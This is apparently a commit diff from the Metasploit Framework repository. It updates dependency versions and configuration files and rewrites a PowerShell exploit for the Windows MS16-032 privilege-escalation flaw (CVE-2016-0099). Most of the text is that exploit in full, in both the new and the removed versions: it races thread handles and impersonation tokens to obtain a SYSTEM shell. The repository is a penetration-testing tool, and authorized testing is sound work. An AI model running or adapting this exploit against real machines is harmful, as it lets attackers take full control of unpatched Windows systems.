-bindata, 2.4.4, ruby
+bindata, 2.4.6, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
+byebug, 11.1.1, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.4, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
@@ -37,109 +37,114 @@ em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.0.2, MIT
-factory_bot_rails, 5.0.2, MIT
-faker, 2.2.0, MIT
-faraday, 0.15.4, MIT
+factory_bot, 5.1.1, MIT
+factory_bot_rails, 5.1.1, MIT
+faker, 2.2.1, MIT
+faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.2.3, MIT
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.45, "New BSD"
+metasploit-credential, 3.0.4, "New BSD"
+metasploit-framework, 5.0.78, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.11.3, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.4, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.8, MIT
+octokit, 4.16.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.1, MIT
+pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 3.1.1, MIT
-rack, 1.6.11, MIT
+pry-byebug, 3.8.0, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.2.0, MIT
+rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
-rake, 12.3.3, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.2, unknown
+recog, 2.3.7, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.17, "New BSD"
+rex-socket, 0.1.21, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.23, "New BSD"
+rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.8.0, MIT
-rspec-core, 3.8.2, MIT
-rspec-expectations, 3.8.4, MIT
-rspec-mocks, 3.8.1, MIT
-rspec-rails, 3.8.2, MIT
+rspec, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
+rspec-expectations, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
+rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.2, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.3, "Simplified BSD"
+rubyzip, 2.2.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.0, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.5, MIT
+simplecov-html, 0.12.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
-swagger-blocks, 2.0.2, MIT
+swagger-blocks, 3.0.0, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
-tilt, 2.0.9, MIT
+tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2019.2, MIT
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
+tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT

README.md

@@ -1,7 +1,7 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-COPYING for more details.
+[COPYING](COPYING) for more details.
 
 The latest version of this software is available from: https://metasploit.com
 

Vagrantfile

@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
     config.vm.provision "shell", inline: step
   end
 
-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
     "curl -L https://get.rvm.io | bash -s stable",
     "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
     "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",

config/application.rb

@@ -1,3 +1,4 @@
+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
 require 'rails'
 require File.expand_path('../boot', __FILE__)
 

config/boot.rb

@@ -9,6 +9,8 @@ GEMFILE_EXTENSIONS = [
 msfenv_real_pathname = Pathname.new(__FILE__).realpath
 root = msfenv_real_pathname.parent.parent
 
+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
+
 unless ENV['BUNDLE_GEMFILE']
   require 'pathname'
 
@@ -22,18 +24,6 @@ unless ENV['BUNDLE_GEMFILE']
   end
 end
 
-# Remove bigdecimal warning - start
-# https://github.com/ruby/bigdecimal/pull/115
-# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
-# TODO: remove when upgrading from rails 4.x
-require 'bigdecimal'
-
-def BigDecimal.new(*args, **kwargs)
-  return BigDecimal(*args) if kwargs.empty?
-  BigDecimal(*args, **kwargs)
-end
-# Remove bigdecimal warning - end
-
 begin
   require 'bundler/setup'
 rescue LoadError => e

config/rails_bigdecimal_fix.rb

@@ -0,0 +1,11 @@
+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end

data/exploits/CVE-2016-0099/cve_2016_0099.ps1

@@ -1,347 +1,371 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
 
-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName
 
-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
 
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero
 
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
 
-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			echo "$end"
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
 
-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
